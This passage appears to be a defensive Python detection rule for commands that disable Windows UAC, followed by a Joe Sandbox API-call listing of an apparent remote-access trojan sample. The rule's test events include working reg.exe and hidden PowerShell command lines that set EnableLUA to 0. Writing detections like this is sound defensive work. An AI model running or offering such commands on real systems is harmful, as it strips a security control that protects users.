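     "command_line": r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"image": r"C:\Windows\System32\reg.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0x0 /f'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell.exe -NoP -W Hidden -c "Set-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA -Value 0"'},
    {"image": r"C:\Windows\System32\reg.exe", "parent_image": r"C:\Windows\System32\cmd.exe",  # re-enables UAC: benign
     "command_line": r"reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f"},
    {"image": r"C:\Windows\System32\reg.exe", "parent_image": r"C:\Windows\System32\cmd.exe",  # read-only query: benign
     "command_line": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA"},
]

# Key path in either root-key spelling, with or without the PowerShell drive colon.
UAC_POLICY_KEY = re.compile(
    r"(?:HKLM|HKEY_LOCAL_MACHINE):?\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\b", re.I)
REG_ADD = re.compile(r"\breg(?:\.exe)?\s+add\b", re.I)
REG_VALUE_ENABLELUA = re.compile(r'/v\s+"?EnableLUA"?(?=\s)', re.I)
REG_DATA_ZERO = re.compile(r'/d\s+"?(?:0x)?0+"?(?=\s|$)', re.I)   # 0, 00, 0x0 ... but not 01
PS_SET_ZERO = re.compile(
    r'Set-ItemProperty\b.*?-Name\s+["\']?EnableLUA["\']?.*?-Value\s+["\']?(?:0x)?0+["\']?(?=\s|$)', re.I)
CMD_K = re.compile(r"\bcmd(?:\.exe)?\s+/k\b", re.I)


def detect_uac_disable(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a hit when the command line writes EnableLUA=0 under the UAC policy key."""
    cl = event.get("command_line", "")
    if not UAC_POLICY_KEY.search(cl):
        return None
    if REG_ADD.search(cl) and REG_VALUE_ENABLELUA.search(cl) and REG_DATA_ZERO.search(cl):
        technique = "reg add EnableLUA=0"
    elif PS_SET_ZERO.search(cl):
        technique = "Set-ItemProperty EnableLUA=0"
    else:
        return None  # query, re-enable (/d 1), or an unrelated write to the same key
    return {
        "technique": technique,
        "image": event.get("image"),
        "parent_image": event.get("parent_image"),
        "via_cmd_k": bool(CMD_K.search(cl)),  # the sample's cmd.exe /k wrapper
    }


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [hit for hit in (detect_uac_disable(e) for e in events) if hit is not None]


if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(hit)
```

Against the constructed events this flags the first three and ignores the re-enable and the read-only query. Because the rule reads only command lines, a write performed through RegSetValueExW from the malware's own process would not produce a process-creation event at all; pair it with registry-set telemetry (Sysmon Event ID 13 on the same key and value) to cover that path, and treat any EnableLUA=0 hit whose parent is a user-writable path such as the Desktop, as in event 0, as high confidence.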
                                        APIs
                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?,0046DAE0,0000000C,00442691,?,00000002), ref: 00442609
                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044261C
                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0044259A,?,?,0044253A,?,0046DAE0,0000000C,00442691,?,00000002,00000000), ref: 0044263F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressFreeHandleLibraryModuleProc
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 4061214504-1276376045
                                        • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                        • Instruction ID: e7b95c4573467c94f6f12cd45ce5b447d53bb0dab0bc43500ba4ddd7032d9ec5
                                        • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                        • Instruction Fuzzy Hash: 99F04430A04209FBDB119F95ED09B9EBFB5EB08756F4140B9F805A2251DF749D41CA9C
                                        APIs
                                        • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                        • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                        • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseCreateValue
                                        • String ID: pth_unenc$BG
                                        • API String ID: 1818849710-2233081382
                                        • Opcode ID: 2b0b83c385fe9b11323970af50dff3bb0d924dce91bf1d9d78cbef32cf6cf5ea
                                        • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                        • Opcode Fuzzy Hash: 2b0b83c385fe9b11323970af50dff3bb0d924dce91bf1d9d78cbef32cf6cf5ea
                                        • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                        • SetEvent.KERNEL32(00000304), ref: 00404AF9
                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                        • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                          • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                        • String ID: KeepAlive | Disabled
                                        • API String ID: 2993684571-305739064
                                        • Opcode ID: 706b613343be8dae912c097df07bb168f2a932249c2424fe80eb320cd199b408
                                        • Instruction ID: 6d19fc1829a92c7d53a4a1495ceb054f41c43dbe57a1f104861afa743dff4d10
                                        • Opcode Fuzzy Hash: 706b613343be8dae912c097df07bb168f2a932249c2424fe80eb320cd199b408
                                        • Instruction Fuzzy Hash: CDF0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890C75A
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF12), ref: 0041BE89
                                        • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BE96
                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF12), ref: 0041BEA3
                                        • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF12), ref: 0041BEB6
                                        Strings
                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BEA9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                        • API String ID: 3024135584-2418719853
                                        • Opcode ID: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                        • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                        • Opcode Fuzzy Hash: b49fb2298264b14de8b5a7e9b756d7938e22e1a5816d236ca91e9d4b7b0725d3
                                        • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                        • Instruction ID: 7508e0c950cfb5c07cf094bbf9e96825b82cecf32722f8b1b9d99ff1c2b3a0ae
                                        • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                        • Instruction Fuzzy Hash: 0171C5319043169BEB21CF55C884ABFBB75FF51360F14426BEE50A7281C7B89C61CBA9
                                        APIs
                                          • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                        • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                        • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                        • String ID:
                                        • API String ID: 3525466593-0
                                        • Opcode ID: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                        • Instruction ID: 8d6069787765cd8089b920b9a1774e70d04059e2b0db351aafb66b48fc3d0dee
                                        • Opcode Fuzzy Hash: d29f1b7113f080e4870f36b8e837f1b4da9fc16b6a23fadf89bc0212f3888b6d
                                        • Instruction Fuzzy Hash: 3161C370200301ABD720DF66C981BA77BA6BF44744F04411AF9058B786EBF8E8C5CB99
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                        • Instruction ID: 83c4e6e90d702b2f07d890eb74d666dbf881ebcc09a41958ef300e35f10bd01d
                                        • Opcode Fuzzy Hash: f0a2e76299140c1b889b6a2776586b742041be663085ede9ef76686f57abf0cb
                                        • Instruction Fuzzy Hash: 6041F732A002049FEB24DF79C881A5EB7B5EF89718F1585AEE515EB341DB35EE01CB84
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3FD,?,00000000,?,00000001,?,?,00000001,0043E3FD,?), ref: 0044FF30
                                        • __alloca_probe_16.LIBCMT ref: 0044FF68
                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFB9
                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399CF,?), ref: 0044FFCB
                                        • __freea.LIBCMT ref: 0044FFD4
                                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                        • String ID:
                                        • API String ID: 313313983-0
                                        • Opcode ID: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                        • Instruction ID: e1bca46ef404bc628c8ce9314a93e43560c5f9fd50e6ec62d56fad3e85d1de09
                                        • Opcode Fuzzy Hash: f170efb2dc1c6de9df76393386ebf7cd534c4364e4366eebd744cf228c8edce4
                                        • Instruction Fuzzy Hash: B731DC32A0020AABEB248F65DC81EAF7BA5EB01314F04417AFC05D7251E739DD59CBA8
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044E154
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E177
                                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E19D
                                        • _free.LIBCMT ref: 0044E1B0
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1BF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                        • Instruction ID: 6461b62384d036c2086eeacc55d57ac9fa1e09cc40192d7ba399f745acfb761f
                                        • Opcode Fuzzy Hash: a9616c8c015984253ca72814521cc13fd9597de4e0bdad696dd641cecd3264f2
                                        • Instruction Fuzzy Hash: 7301D4726417117F33215AB76C8CC7B7A6DEAC6FA5319013AFC04D2241DA788C0291B9
                                        APIs
                                        • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445369,00440AAB,00000000,?,?,?,?,00440C8E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F58
                                        • _free.LIBCMT ref: 00446F8D
                                        • _free.LIBCMT ref: 00446FB4
                                        • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FC1
                                        • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FCA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                        • Instruction ID: 63179894ab579f9662c65df04eda1c4e2cfad31ee62bae45dd706db9c2735e37
                                        • Opcode Fuzzy Hash: d9a11e8b10a3382acc57acd06360e0df9f500200efacd02ff515e0ca4c66fe47
                                        • Instruction Fuzzy Hash: 4F01D67620C7006BF61227757C85D2B1669EBC3776727013FF859A2292EE6CCC0A415F
                                        APIs
                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                        • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B3D8
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseHandleOpen$FileImageName
                                        • String ID:
                                        • API String ID: 2951400881-0
                                        • Opcode ID: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                        • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                                        • Opcode Fuzzy Hash: db4a41822c85b6549257f18fa46790b7e5e5d5e6a524df97c50e7420b53bdc77
                                        • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                                        APIs
                                        • _free.LIBCMT ref: 0044F7C5
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        • _free.LIBCMT ref: 0044F7D7
                                        • _free.LIBCMT ref: 0044F7E9
                                        • _free.LIBCMT ref: 0044F7FB
                                        • _free.LIBCMT ref: 0044F80D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                        • Instruction ID: 070623068f58a673a03bb4c9f7ddd8597c716d05cca38f31fa25b5a97b2bc473
                                        • Opcode Fuzzy Hash: 24d082c4c32556380d94a426a0797d769337f58152c77e2724906da83e703e03
                                        • Instruction Fuzzy Hash: CBF01232505610ABA620EB59F9C1C1773EAEA427247A5882BF048F7A41C77DFCC0866C
                                        APIs
                                        • _free.LIBCMT ref: 00443315
                                          • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A), ref: 00446AEB
                                          • Part of subcall function 00446AD5: GetLastError.KERNEL32(0000000A,?,0044FA60,0000000A,00000000,0000000A,00000000,?,0044FD04,0000000A,00000007,0000000A,?,00450215,0000000A,0000000A), ref: 00446AFD
                                        • _free.LIBCMT ref: 00443327
                                        • _free.LIBCMT ref: 0044333A
                                        • _free.LIBCMT ref: 0044334B
                                        • _free.LIBCMT ref: 0044335C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                        • Instruction ID: ba617ab3bec5ed021708e8d9793ec2f19a393bb4d037fa002b455214101d6763
                                        • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                        • Instruction Fuzzy Hash: E1F03AB08075208FA712AF6DBD014493BA1F706764342513BF41AB2A71EB780D81DA8E
                                        APIs
                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00416768
                                        • GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
                                        • IsWindowVisible.USER32(?), ref: 004167A1
                                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                          • Part of subcall function 0041B38D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmp
